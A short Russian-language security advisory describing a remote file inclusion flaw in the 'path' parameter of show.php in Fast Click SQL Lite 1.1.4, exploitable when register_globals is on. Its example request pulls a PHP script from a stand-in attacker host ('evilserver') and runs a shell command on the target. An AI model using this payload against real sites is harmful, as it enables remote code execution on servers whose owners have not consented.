Программа: Fast Click SQL Lite 1.1.4, возможно другие
версии.

Уязвимость позволяет удаленному
пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за
недостаточной обработки входных данных в
параметре "path" в сценарии show.php.
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Для удачной эксплуатации уязвимости опция
"register_globals" должна быть включена.

Пример:

http://[target].com/[path]/show.php?path= http://evilserver/cmd.gif?&cmd=uname
-a



Оставить мнение